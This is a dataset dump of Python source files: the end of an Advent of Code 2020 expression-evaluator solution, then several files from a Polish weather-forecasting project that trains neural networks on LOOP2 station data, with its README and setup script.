"content_id": "1a6edde43359526208874dc833a77e107205514f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2330,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 68,
"path": "/18/18.py",
"repo_name": "rneilsen/advent-of-code-2020",
"src_encoding": "UTF-8",
"text": "from os.path import abspath, dirname, join\nfrom collections import deque\nfrom itertools import islice\nfrom typing import List, Tuple\n\nwith open(abspath(join(dirname(__file__), 'input'))) as f:\n lines = [l.strip() for l in f.readlines()]\n\ndef evaluate(line: List[str]) -> Tuple[int, List[str]]:\n while '(' in line:\n start_paren = end_paren = line.index('(')\n paren_depth = 1\n while paren_depth > 0:\n end_paren += 1\n if line[end_paren] == '(':\n paren_depth += 1\n elif line[end_paren] == ')':\n paren_depth -= 1\n line = line[:start_paren] + \\\n [evaluate(line[start_paren+1:end_paren])] + \\\n line[end_paren+1:]\n \n val = int(line[0])\n i = 1\n while i < len(line):\n if line[i] == '+':\n val += int(line[i+1])\n elif line[i] == '*':\n val *= int(line[i+1])\n i += 2\n return val\n\n\ndef part1() -> int:\n return sum([evaluate(list(line.replace(' ', ''))) for line in lines])\n\ndef part2() -> int:\n # parse input to insert parens around all addition expressions\n new_lines = []\n for line in lines:\n line = line.replace(' ', '')\n next_plus = line.find('+')\n while next_plus != -1:\n left_edge = next_plus - 1\n paren_depth = (1 if line[left_edge] == ')' else 0)\n while paren_depth > 0:\n left_edge -= 1\n if line[left_edge] == ')':\n paren_depth += 1\n elif line[left_edge] == '(':\n paren_depth -= 1\n right_edge = next_plus + 1\n paren_depth = (1 if line[right_edge] == '(' else 0)\n while paren_depth > 0:\n right_edge += 1\n if line[right_edge] == '(':\n paren_depth += 1\n elif line[right_edge] == ')':\n paren_depth -= 1\n if left_edge != 0 or right_edge != len(line) - 1:\n line = line[:left_edge] + '(' + line[left_edge:right_edge + 1] + ')' + line[right_edge + 1:]\n next_plus = line.find('+', next_plus + 2)\n new_lines.append(line)\n\n return sum([evaluate(list(line.replace(' ', ''))) for line in new_lines])\n\nprint(\"Part 1:\", part1())\nprint(\"Part 2:\", part2())"
}
] | 1 |
aquarioos/dvik-forecast | https://github.com/aquarioos/dvik-forecast | c7c720a7a57a5c1b32923cacfc703c6ccf16af72 | 659fdb4a8108ed82cbab53ce78498de11f6d5047 | ee3ee5f3fa110b99ec59b9799351d9fdcb365fc4 | refs/heads/master | 2018-11-17T06:12:33.576414 | 2018-09-04T23:23:27 | 2018-09-04T23:23:27 | 144,966,812 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5906499624252319,
"alphanum_fraction": 0.5952109694480896,
"avg_line_length": 25.57575798034668,
"blob_id": "37363517abcd5799b9969eb15eb4bd61f746fe95",
"content_id": "1e0c4b82c3ec0fd468b110224296e1c99334bc4b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 885,
"license_type": "permissive",
"max_line_length": 102,
"num_lines": 33,
"path": "/tools/command_line.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import argparse as ap\n\nfrom . import rank\n\n\ndef _get_args() -> ap.Namespace:\n \"\"\"Pobiera komendę:\n\n * cmd - komenda\n\n Returns:\n wybrana komenda\n \"\"\"\n\n parser = ap.ArgumentParser()\n\n parser.add_argument('cmd', metavar='CMD', choices=('rank', 'cmd1', 'cmd2'),\n help='Komenda wskazująca które narzędzie zostanie użyte.')\n parser.add_argument('-cfp', '--csv_file_path', help=\"Ścieżka do pliku CSV, wymagane przy 'rank'.\")\n parser.add_argument('-n', '--n_best', type=int, default=25,\n help=\"Liczba najlepszych resultatów\")\n parser.add_argument('-m', '--minimal', action='store_true')\n\n return parser.parse_args()\n\n\ndef main():\n # print('*** DVIK-FORECAST-TOOLS COMMAND_LINE ***')\n\n args = _get_args()\n\n if args.cmd == 'rank':\n rank.run(args.csv_file_path, args.n_best, args.minimal)\n"
},
{
"alpha_fraction": 0.6314911842346191,
"alphanum_fraction": 0.6357789635658264,
"avg_line_length": 29.642335891723633,
"blob_id": "e47a6ffdf43c701866ad8597a54828631e58a176",
"content_id": "5c1f01f57033c2f8b541259f867c33e5fb4df091",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4250,
"license_type": "permissive",
"max_line_length": 109,
"num_lines": 137,
"path": "/tools/rank.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import csv\nimport os\nimport typing\n\nMEAN_DIFF = 'średnie odchylenie'\nMED_DIFF = 'mediana odchylenia'\nMAX_DIFF = 'maksymalne odchylenie'\nSOLVER = 'solver'\nACTIVATION = 'activation'\nHIDDEN_LAYERS = 'hidden_layers'\nCSV_FIELDS = ['średnie odchylenie', 'mediana odchylenia', 'maksymalne odchylenie',\n 'oczekiwane odchylenie standardowe', 'otrzymane odchylenie standardowe']\n\n\n# N_RESULTS = 25\n\n\ndef run(csv_file: str, n_best: int, minimal: bool):\n \"\"\"Uruchamia polecenie \"rank\".\n Potrzebuje pliku CSV z wynikami uczenia.\n Ten plik musi mieć konkretną strukturę! Tzn. musi mieć pola, po których będzie sortowanie.\n Jak nie ma któregoś z wymaganych pól, to do widzenia.\n A jak są, to sortuje i wypisuje to w ładnej formie. Na razie zwykły ciąg typu \"key=value, key=value, ...\"\n\n Args:\n csv_file: ścieżka do pliku csv\n n_best: liczna najlepszych rezultatów\n minimal: czy pokazać minimalne wyjście (tylko statystyki parametrów)\n\n Raises:\n IOError: jeśli plik CSV nie zawiera tego, co trzeba lub (co gorsze) nie istnieje\n ValueError: jeśli csv_file jest None\n \"\"\"\n\n if csv_file is None:\n raise ValueError(\"ścieżka do pliku CSV jest None\")\n\n csv_file = os.path.abspath(csv_file)\n\n if not os.path.exists(csv_file):\n raise IOError(\"plik {} nie istnieje\".format(csv_file))\n\n rows = []\n with open(csv_file, 'r') as fp:\n reader = csv.DictReader(fp)\n for row in reader:\n rows.append(row)\n\n n_results = min(len(rows), n_best)\n\n rows = sorted(rows, key=_stats_score)\n\n opts = _collect_options(rows)\n\n solver_stats = dict.fromkeys(opts[SOLVER], 0)\n activation_stats = dict.fromkeys(opts[ACTIVATION], 0)\n hidden_layers_stats = dict.fromkeys(opts[HIDDEN_LAYERS], 0)\n\n if not minimal:\n print(\"\\nranking {} najlepszych rezultatów:\\n\".format(n_results))\n\n for i, r in enumerate(rows[:n_results]):\n if not minimal:\n print(\"{}. {}={}, {}={}, {}={}\".format(\n i + 1, MEAN_DIFF, r[MEAN_DIFF], MED_DIFF, r[MED_DIFF], MAX_DIFF, r[MAX_DIFF]))\n print(\"\\t{}={}, {}={}, {}={}\".format(\n SOLVER, r[SOLVER], ACTIVATION, r[ACTIVATION], HIDDEN_LAYERS, r[HIDDEN_LAYERS]))\n\n solver_stats[r[SOLVER]] += 1\n activation_stats[r[ACTIVATION]] += 1\n hidden_layers_stats[r[HIDDEN_LAYERS]] += 1\n\n print(\"\\nprocentowy udział parametrów klasyfikatora dla {} najlepszych rezultatów:\\n\".format(n_results))\n\n print(SOLVER)\n for k in _sort_options_stats(solver_stats):\n print(\"\\t{} = {}%\".format(k, round(100 * solver_stats[k] / n_results)))\n\n print(ACTIVATION)\n for k in _sort_options_stats(activation_stats):\n print(\"\\t{} = {}%\".format(k, round(100 * activation_stats[k] / n_results)))\n\n print(HIDDEN_LAYERS)\n for k in _sort_options_stats(hidden_layers_stats):\n print(\"\\t{} = {}%\".format(k, round(100 * hidden_layers_stats[k] / n_results)))\n\n\ndef _sort_options_stats(opt_dict: typing.Dict[str, int]) -> typing.List[str]:\n \"\"\"Sortuje opcje wg wyników od najwyższego (najwięcej wystąpień).\n\n Args:\n opt_dict: słownik z danymi opcjami\n\n Returns:\n lista kluczy od najczęściej występującego\n \"\"\"\n\n return list(sorted(opt_dict, key=lambda k: opt_dict[k], reverse=True))\n\n\ndef _stats_score(a: typing.Dict[str, float]) -> tuple:\n \"\"\"Zwraca punktację danego wyniku.\n\n Args:\n a: słownik ze statystykami\n\n Returns:\n punkty\n \"\"\"\n\n return a[MEAN_DIFF], a[MAX_DIFF], a[MED_DIFF]\n\n\ndef _collect_options(rows: typing.List[dict]) -> dict:\n \"\"\"Zbiera dostępne opcje dla parametrów solver, activation i hidden_layers.\n\n Args:\n rows: lista słowników reprezentujących wiersze z pliku CSV\n\n Returns:\n słownik przypisujący listę dostępnych opcji dla każdego z parametrów\n \"\"\"\n\n solvers = set()\n activations = set()\n hidden_layers = set()\n\n for r in rows:\n solvers.add(r[SOLVER])\n activations.add(r[ACTIVATION])\n hidden_layers.add(r[HIDDEN_LAYERS])\n\n return {\n SOLVER: list(solvers),\n ACTIVATION: list(activations),\n HIDDEN_LAYERS: list(hidden_layers)\n }\n"
},
{
"alpha_fraction": 0.6126018762588501,
"alphanum_fraction": 0.6173722743988037,
"avg_line_length": 30.05555534362793,
"blob_id": "0814504ec2b2b0170a5e2bfebab26547d434a3c2",
"content_id": "513d14657d48df8651f859fc15c13f9b80e5a7ae",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5080,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 162,
"path": "/dvik_forecast/data_api.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import typing\nimport datetime\nimport os\nimport re\n\nfrom . import defaults as dfs\n\nimport dvik_loop as dvloop\n\nimport dvik_logging as dvl\n\nL = dvl.get_logger(dfs.LOGGER_NAME)\n\n\ndef get_range_dts(data_dir: str, range_days: int,\n interval: int) -> typing.Tuple[datetime.datetime, datetime.datetime]:\n \"\"\"Zwraca datę początku i końca zakresu. Datę początku zaokrągla w górę według interwału, zaś datę końca w dół.\n\n Args:\n data_dir: ścieżka do katalogu z danymi\n range_days: liczba dni zakresu\n interval: interwał czasowy zakresu\n\n Returns:\n data początku, data końca\n \"\"\"\n\n first_dt = _get_first_file_dt(data_dir, dfs.LOOP2_FILE_RE, dfs.LOOP2_FILE_DT)\n\n start_dt = dfs.UTC_NOW - datetime.timedelta(days=range_days)\n if first_dt > start_dt:\n L.warn('start_dt = {}, first_dt = {}, start_dt := first_dt'.format(start_dt, first_dt))\n start_dt = first_dt\n end_dt = dfs.UTC_NOW\n\n interval_hrs = datetime.timedelta(hours=interval)\n\n tmp_dt = datetime.datetime(year=start_dt.year, month=start_dt.month, day=start_dt.day)\n while tmp_dt < start_dt:\n tmp_dt += interval_hrs\n L.debug('start_dt = {} -> {}'.format(start_dt, tmp_dt))\n start_dt = tmp_dt\n\n tmp_dt = datetime.datetime(year=end_dt.year, month=end_dt.month, day=end_dt.day)\n while tmp_dt <= end_dt - interval_hrs:\n tmp_dt += interval_hrs\n L.debug('end_dt = {} -> {}'.format(end_dt, tmp_dt))\n end_dt = tmp_dt\n\n return start_dt, end_dt\n\n\ndef _get_first_file_dt(data_dir: str, data_file_re: str, data_file_dt: str) -> datetime.datetime:\n \"\"\"Zwraca datę najstarszego pliku z danymi z danego zbioru.\n\n Args:\n data_dir: ścieżka do katalogu z danymi\n data_file_re: wzorzec nazwy pliku (np. r'loop2_\\d{6}_\\d{4}\\.dat')\n data_file_dt: wzorzec daty w nazwie pliku (np. 'loop2_%y%m%d_%h%m.dat')\n\n Returns:\n data pierwszego pliku\n \"\"\"\n\n min_year_dir = min(filter(\n lambda d: re.match(r'\\d{4}', d),\n os.listdir(data_dir)\n ))\n year_data_dir = os.path.join(data_dir, min_year_dir)\n min_month_dir = min(filter(\n lambda d: re.match(r'\\d{2}', d),\n os.listdir(year_data_dir)\n ))\n month_data_dir = os.path.join(year_data_dir, min_month_dir)\n min_day_dir = min(filter(\n lambda d: re.match(r'\\d{2}', d),\n os.listdir(month_data_dir)\n ))\n day_data_dir = os.path.join(month_data_dir, min_day_dir)\n min_file = min(filter(\n lambda d: re.match(data_file_re, d),\n os.listdir(day_data_dir)\n ))\n\n return datetime.datetime.strptime(min_file, data_file_dt)\n\n\ndef get_loop2_data(data_dir: str, start_dt: datetime.datetime, end_dt: datetime.datetime,\n interval: int) -> typing.Dict[datetime.datetime, dict]:\n \"\"\"Zwraca słownik z danymi LOOP2 w formacie data -> słownik z wartościami.\n\n Args:\n data_dir: ścieżka do katalogu z danymi LOOP2\n start_dt: początkowa data zakresu\n end_dt: końcowa data zakresu\n interval: interwał czasowy w godzinach\n\n Returns:\n słownik z danymi LOOP2 przypisujący słownik z wartościami dla dat\n \"\"\"\n\n l2s = dvloop.Loop2Series(data_dir, start_dt, end_dt, interval)\n l2_data = l2s.get_data(with_current=False)\n\n return l2_data\n\n\ndef get_dts(start_dt: datetime.datetime, end_dt: datetime.datetime,\n interval: int) -> typing.List[datetime.datetime]:\n \"\"\"Zwraca\n\n Args:\n start_dt: początek zakresu\n end_dt: koniec zakresu\n interval: interwał zakresu\n\n Returns:\n posortowana lista dat z danego zakresu\n \"\"\"\n\n interval_td = datetime.timedelta(hours=interval)\n tmp_dt = start_dt\n dts = []\n while tmp_dt <= end_dt:\n dts.append(tmp_dt)\n tmp_dt += interval_td\n\n return dts\n\n\ndef get_dt_sets(dts: typing.List[datetime.datetime], n_sets: int, set_intervals: int,\n horizon_intervals: typing.List[int]\n ) -> typing.List[typing.Dict[str, typing.List[datetime.datetime]]]:\n \"\"\"Tworzy listę zestawów dat wejściowych i wyjściowych. Lista jest w postaci\n [{'in_dts': [dt1, dt2, ...], 'out_dts': [dt1, dt2, ...]}, ...]\n\n Args:\n dts: dostępne daty w zakresie\n n_sets: całkowita liczba zestawów (uczących i testowych)\n set_intervals: liczba interwałów w zestawie\n horizon_intervals: interwały do prognozowania\n\n Returns:\n lista zestawów dat\n \"\"\"\n\n set_size = set_intervals + max(horizon_intervals)\n step = (len(dts) - set_size) // n_sets\n\n dt_sets = [] # {in_dts: [], out_dts: []}\n\n for offset in range(0, n_sets * step, step):\n in_dts = [dts[i + 1] for i in range(offset, offset + set_intervals)]\n out_dts = [dts[i] for i in [offset + set_intervals + fi for fi in horizon_intervals]]\n dt_sets.append({\n 'in_dts': in_dts,\n 'out_dts': out_dts,\n })\n assert all(dt in dts for dt in in_dts)\n assert all(dt in dts for dt in out_dts)\n\n return dt_sets\n"
},
{
"alpha_fraction": 0.4324618875980377,
"alphanum_fraction": 0.46568626165390015,
"avg_line_length": 29.600000381469727,
"blob_id": "dba5f56364a163e1515b23b047517995eaabd973",
"content_id": "18d774b5b49f5ccd9513eb2e77cc3fa034d83abf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1836,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 60,
"path": "/dvik_forecast/table.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "class Table:\n def __init__(self, side='left', extra_space=1):\n self.__data = {}\n self.__tr_data = {}\n self.__min_col = 999999\n self.__max_col = -999999\n self.__min_row = 999999\n self.__max_row = -999999\n assert side in ('left', 'right')\n if side == 'left':\n self.__just = lambda v, w: v.ljust(w + extra_space)\n else:\n self.__just = lambda v, w: v.rjust(w + extra_space)\n\n def add(self, row, col, val):\n assert isinstance(row, int)\n assert isinstance(col, int)\n val = str(val)\n if not row in self.__data:\n self.__data[row] = {}\n self.__data[row][col] = val\n\n self.__min_row = min(row, self.__min_row)\n self.__max_row = max(row, self.__max_row)\n self.__min_col = min(col, self.__min_col)\n self.__max_col = max(col, self.__max_col)\n\n def __str__(self):\n arr = []\n for row in range(self.__min_row, self.__max_row + 1):\n curr_row = []\n for col in range(self.__min_col, self.__max_col + 1):\n try:\n curr_row.append(self.__data[row][col])\n except KeyError:\n curr_row.append('')\n arr.append(curr_row)\n\n for col in range(self.__max_col - self.__min_col + 1):\n max_width = 0\n for row in arr:\n max_width = max(max_width, len(row[col]))\n for row in arr:\n row[col] = self.__just(row[col], max_width)\n\n return '\\n'.join(' '.join(v for v in col) for col in arr)\n\n\nif __name__ == '__main__':\n t = Table(extra_space=3)\n\n t.add(1, 1, '111')\n t.add(1, 2, '12')\n t.add(1, 3, '13')\n t.add(2, 1, '21')\n t.add(2, 2, '221')\n t.add(2, 3, '23')\n t.add(4, 3, '431')\n\n print(t)\n"
},
{
"alpha_fraction": 0.608960747718811,
"alphanum_fraction": 0.6460763812065125,
"avg_line_length": 24.3154354095459,
"blob_id": "392fdee173f541b1d87661e4d789ea8d8688f44f",
"content_id": "23ea4758e0f8954dac4b18cbdef568aef59bd084",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3854,
"license_type": "permissive",
"max_line_length": 212,
"num_lines": 149,
"path": "/README.md",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "# dvik-forecast\nPrognozowanie pogody za pomocą uczenia maszynowego.\n\n## Wersja\n\n0.3\n\n## Zmiany\n\n### 0.3\n\n* dodanie niepewności standardowej\n* prognozowanie wartości parametrów\n* zamiana forecasts na horizons\n\n### 0.2\n\n* dodanie możliwości nadpisywania domyślnych parametrów za pomocą pliku JSON (rozdział **Nadpisywanie domyślnych wartości**)\n* dodanie obsługi wiatru, ciśnienia i opadu\n* README\n* obsługa 4 parametrów: temperatury, wiatru, ciśnienia i opadu\n\n## Instalacja\n\nModuł *dvik-forecast* instalujemy za pomocą menadżera pakietów *PIP*. Ponieważ w zależnościach są inne moduły systemu *dvik*, to należy dodać flagę `--process-dependency-links`.\n\n pip install git+https://github.com/aquarioos/dvik-forecast/#egg=dvik-forecast\n\n## Uruchomienie\n\nJeżeli program został poprawnie zainstalowany, to uruchamiamy go następująco:\n\n dvik-forecast [-h] -t {loop2,imgw} -dd DATA_DIR [-od OUTPUT_DIR] [-ld LOGS_DIR] [-d RANGE_DAYS] [-i {1,2,3,4,6,12}] [-ns TRAIN_SETS] [-nd TRAIN_DAYS] [-ts TEST_SETS] [-f FORECAST [FORECAST ...]] [-j CFG_JSON]\n\ngdzie:\n\n**-h, --help**\n\nPokazuje treść pomocy, program nie jest uruchamiany w takiej sytuacji.\n\n**-t {loop2,imgw}, --data_type {loop2,imgw}**\n\nRodzaj danych, na podstawie których będzie wyznaczana prognoza.\n\n**-dd DATA_DIR, --data_dir DATA_DIR**\n\nŚcieżka do katalogu z danymi. Musi być zgodna z rodzajem danych.\n\n**-od OUTPUT_DIR, --output_dir OUTPUT_DIR**\n\nKatalog na wyniki (domyślnie $HOME/dvf_data/forecast).\n\n**-ld LOGS_DIR, --logs_dir LOGS_DIR**\n\nKatalog na logi (domyślnie $HOME/dvf_data/logs).\n\n**-d RANGE_DAYS, --range_days RANGE_DAYS**\n\nLiczba dni wstecz (domyślnie 61).\n\n**-i {1,2,3,4,6,12}, --interval {1,2,3,4,6,12}**\n\nInterwał czasowy (1, 2, 3, 4, 6 lub 12, domyślnie 3).\n\n**-ns TRAIN_SETS, --train_sets TRAIN_SETS**\n\nLiczba zbiorów uczących (domyślnie 10).\n\n**-nd TRAIN_DAYS, --train_days TRAIN_DAYS**\n\nWielkość (w dniach) zbiorów uczących (domyślnie 10).\n\n**-ts TEST_SETS, --test_sets TEST_SETS**\n\nLiczba zbiorów testowych (domyślnie 5).\n\n**-s HORIZONS \\[HORIZONS ...\\], --horizons HORIZONS \\[HORIZONS ...\\]**\n\nGodziny prognozy (np. 6, 12, 18, 24, domyślnie \\[12, 24\\]). Muszą być podzielne przez interwał.\n\n**-j CFG_JSON, --cfg_json CFG_JSON**\n\nŚcieżka do pliku json z nadpisanymi domyślnymi parametrami klasyfikatora.\n\n## Nadpisywanie domyślnych wartości\n\nParametr *-j/--cfg_json* wskazuje na plik, w którym są nadpisane domyślne wartości, które przedstawiają się następująco:\n\n TEMPERATURE_TOLERANCE = 1.5\n\n PRESSURE_TOLERANCE = 2\n\n WIND_TOLERANCE = 2\n\n PRECIPITATION_TOLERANCE = 1\n\n HIDDEN_LAYER_FACTORS = [\n [1], [2],\n [1, 1], [2, 2],\n [1, 1.2, 1], [2, 2.4, 2],\n [1, 1, 1, 1], [2, 2, 2, 2],\n [1, 1.2, 1.4, 1.2, 1], [2, 2.4, 2.8, 2.4, 2],\n [1, 1, 1, 1, 1, 1], [2, 2, 2, 2, 2, 2],\n ]\n\n MAX_ITER = 500000\n\n RES_SCALE = 4\n\n N_REPS = 15\n\n ACTIVATIONS = ['identity', 'logistic', 'tanh', 'relu']\n\n SOLVERS = ['lbfgs', 'sgd', 'adam']\n\n EARLY_STOPPING = True\n\nW celu nadpisywania powyższych parametrów należy dla odpowiadających im kluczy przypisać wybrane nowe wartości.\n\nKlucze:\n\n * temperature_tolerance\n * pressure_tolerance\n * wind_tolerance\n * precipitation_tolerance\n * hidden_layer_factors\n * max_iter\n * res_scale\n * n_reps\n * activations\n * solvers\n\nPrzykładowy plik JSON z nadpisanymi wartościami:\n\n {\n \"temperature_tolerance\": 2,\n \"pressure_tolerance\": 2,\n \"wind_tolerance\": 4,\n \"precipitation_tolerance\": 1.5,\n \"hidden_layer_factors\": [\n [1], [2],\n [1, 1, 1], [2, 2, 2]\n ],\n \"max_iter\": 1000,\n \"res_scale\": 4,\n \"n_reps\": 5,\n \"activations\": [\"logistic\", \"tanh\"],\n \"solvers\": [\"lbfgs\"]\n }\n"
},
{
"alpha_fraction": 0.5659851431846619,
"alphanum_fraction": 0.5855018496513367,
"avg_line_length": 30.647058486938477,
"blob_id": "5c4ddb8b6fb7c100a1143fa2e7d78af21e09866a",
"content_id": "95f70dbcc14c52352887dda0c538c5d1fb5fdf23",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1077,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 34,
"path": "/setup.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "from setuptools import setup\n\nsetup(\n name='dvik-forecast',\n version='0.2',\n description='Moduł do prognozowania pogody.',\n url='https://github.com/aquarioos/dvik-forecast',\n author='Daniel Taranta',\n author_email='[email protected]',\n license='MIT',\n packages=['dvik_forecast', 'tools'],\n include_package_data=True,\n zip_safe=False,\n python_requires='>=3.4',\n install_requires=[\n 'typing',\n 'dvik-loop>=0.7',\n 'dvik-logging>=1.0',\n 'dvik-print>=0.3',\n 'scikit-learn>=0.19',\n 'sklearn',\n 'scipy>=1.1',\n ],\n dependency_links=[\n 'git+https://github.com/aquarioos/dvik-loop.git#egg=dvik-loop-0.7',\n 'git+https://github.com/aquarioos/dvik-logging.git#egg=dvik-logging-1.0',\n 'git+https://github.com/aquarioos/dvik-print.git#egg=dvik-print-0.3',\n ],\n # scripts=['dvik_forecast/command_line.py'],\n entry_points={\n 'console_scripts': ['dvik-forecast = dvik_forecast.command_line:main',\n 'dvik-forecast-tools = tools.command_line:main'],\n },\n)\n"
},
{
"alpha_fraction": 0.5776010155677795,
"alphanum_fraction": 0.5838922262191772,
"avg_line_length": 38.832149505615234,
"blob_id": "6091db4ba2db2991fc29ee6eb0cc77cb91adc200",
"content_id": "5268a26024830555535bc76cb3be0a127c7a930b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 16901,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 423,
"path": "/dvik_forecast/forecast.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import typing\nimport os\nimport datetime\nimport json\n\nfrom . import defaults as dfs\nfrom . import learning as lng\nfrom . import data_api as dapi\n\nimport dvik_logging as dvl\n\nL = dvl.get_logger(dfs.LOGGER_NAME)\ndvl.add_console_handler(dfs.LOGGER_NAME)\nL.debug('logger={}: dodano uchwyt do konsoli'.format(dfs.LOGGER_NAME))\n\nTEMPERATURE_TOLERANCE = 1.5\nPRESSURE_TOLERANCE = 2\nWIND_TOLERANCE = 2\nPRECIPITATION_TOLERANCE = 1\nHIDDEN_LAYER_FACTORS = [\n [1], [2],\n [1, 1], [2, 2],\n [1, 1.2, 1], [2, 2.4, 2],\n [1, 1, 1, 1], [2, 2, 2, 2],\n [1, 1.2, 1.4, 1.2, 1], [2, 2.4, 2.8, 2.4, 2],\n [1, 1, 1, 1, 1, 1], [2, 2, 2, 2, 2, 2],\n]\nACTIVATIONS = [lng.ACTIVATION_IDENTITY, lng.ACTIVATION_LOGISTIC, lng.ACTIVATION_TANH, lng.ACTIVATION_RELU]\nALL_ACTIVATIONS = (lng.ACTIVATION_IDENTITY, lng.ACTIVATION_LOGISTIC, lng.ACTIVATION_TANH, lng.ACTIVATION_RELU)\nSOLVERS = [lng.SOLVER_LBFGS, lng.SOLVER_SGD, lng.SOLVER_ADAM]\nALL_SOLVERS = (lng.SOLVER_LBFGS, lng.SOLVER_SGD, lng.SOLVER_ADAM)\nMAX_ITER = 500000\nEARLY_STOPPING = True\nRES_SCALE = 4\nN_REPS = 15\n\nGOOD_RESULT = {\n 'min_result_score': 0.45,\n 'max_max_diff': 7.0,\n 'max_mean_diff': 2.8,\n 'max_med_diff': 2.4,\n 'max_sd_diff': TEMPERATURE_TOLERANCE,\n}\n\nTEMPERATURE_CODE = 'temp'\nPRESSURE_CODE = 'press'\nWIND_CODE = 'wind'\nPRECIPITATION_CODE = 'prec'\n\n\ndef _overwrite_defaults(cfg_json: str):\n \"\"\"Nadpisuje domyślne parametry klasyfikatora wartościami z pliku JSON.\n\n * temperature_tolerance: float\n * pressure_tolerance: float\n * wind_tolerance: float\n * precipation_tolerance: float\n * hidden_layer_factors: typing.List[typing.List[int]]\n * max_iter: int\n * res_scale: float\n * n_reps: int\n * activations: list\n * solvers: list\n\n Args:\n cfg_json: plik json\n \"\"\"\n\n temperature_tolerance_key = 'temperature_tolerance'\n pressure_tolerance_key = 'pressure_tolerance'\n wind_tolerance_key = 'wind_tolerance'\n precipitation_tolerance_key = 'precipitation_tolerance'\n hidden_layer_factors_key = 'hidden_layer_factors'\n max_iter_key = 'max_iter'\n res_scale_key = 'res_scale'\n n_reps_key = 'n_reps'\n activations_key = 'activations'\n solvers_key = 'solvers'\n\n json_data = json.load(open(cfg_json, 'r'))\n\n # TEMPERATURE TOLERANCE\n if temperature_tolerance_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(temperature_tolerance_key))\n if type(json_data[temperature_tolerance_key]) in (int, float):\n L.info(\"TEMPERATURE_TOLERANCE = {} -> {}\".format(\n TEMPERATURE_TOLERANCE,\n json_data[temperature_tolerance_key]\n ))\n global TEMPERATURE_TOLERANCE\n TEMPERATURE_TOLERANCE = json_data[temperature_tolerance_key]\n\n # PRESSURE TOLERANCE\n if pressure_tolerance_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(pressure_tolerance_key))\n if type(json_data[pressure_tolerance_key]) in (int, float):\n L.info(\"PRESSURE_TOLERANCE = {} -> {}\".format(\n PRESSURE_TOLERANCE,\n json_data[pressure_tolerance_key]\n ))\n global PRESSURE_TOLERANCE\n PRESSURE_TOLERANCE = json_data[pressure_tolerance_key]\n\n # WIND TOLERANCE\n if wind_tolerance_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(wind_tolerance_key))\n if type(json_data[wind_tolerance_key]) in (int, float):\n L.info(\"WIND_TOLERANCE = {} -> {}\".format(\n WIND_TOLERANCE,\n json_data[wind_tolerance_key]\n ))\n global WIND_TOLERANCE\n WIND_TOLERANCE = json_data[wind_tolerance_key]\n\n # PRECIPITATION TOLERANCE\n if precipitation_tolerance_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(precipitation_tolerance_key))\n if type(json_data[precipitation_tolerance_key]) in (int, float):\n L.info(\"PRECIPITATION_TOLERANCE = {} -> {}\".format(\n PRECIPITATION_TOLERANCE,\n json_data[precipitation_tolerance_key]\n ))\n global PRECIPITATION_TOLERANCE\n PRECIPITATION_TOLERANCE = json_data[precipitation_tolerance_key]\n\n # HIDDEN LAYER FACTORS\n if hidden_layer_factors_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(hidden_layer_factors_key))\n if isinstance(json_data[hidden_layer_factors_key], list):\n ok_type = True\n for hlf in json_data[hidden_layer_factors_key]:\n if not isinstance(hlf, list) or not all(type(f) in (float, int) for f in hlf):\n ok_type = False\n break\n L.info(\"HIDDEN_LAYER_FACTORS = {} -> {}\".format(\n HIDDEN_LAYER_FACTORS,\n json_data[hidden_layer_factors_key]\n ))\n if ok_type:\n global HIDDEN_LAYER_FACTORS\n HIDDEN_LAYER_FACTORS = json_data[hidden_layer_factors_key]\n\n # MAX ITER\n if max_iter_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(max_iter_key))\n if isinstance(json_data[max_iter_key], int):\n L.info(\"MAX_ITER = {} -> {}\".format(MAX_ITER, json_data[max_iter_key]))\n global MAX_ITER\n MAX_ITER = json_data[max_iter_key]\n\n # RES SCALE\n if res_scale_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(res_scale_key))\n if type(json_data[res_scale_key]) in (int, float):\n L.info(\"RES_SCALE = {} -> {}\".format(RES_SCALE, json_data[res_scale_key]))\n global RES_SCALE\n RES_SCALE = json_data[res_scale_key]\n\n # N REPS\n if n_reps_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(n_reps_key))\n if isinstance(json_data[n_reps_key], int):\n L.info(\"N_REPS = {} -> {}\".format(N_REPS, json_data[n_reps_key]))\n global N_REPS\n N_REPS = json_data[n_reps_key]\n\n # ACTIVATIONS\n if activations_key in json_data:\n L.debug(\"znaleziono klucz '{}'\".format(activations_key))\n if isinstance(json_data[activations_key], list):\n if not all(a in ALL_ACTIVATIONS for a in json_data[activations_key]):\n raise ValueError(\"wartości {} powinny być ze zbioru 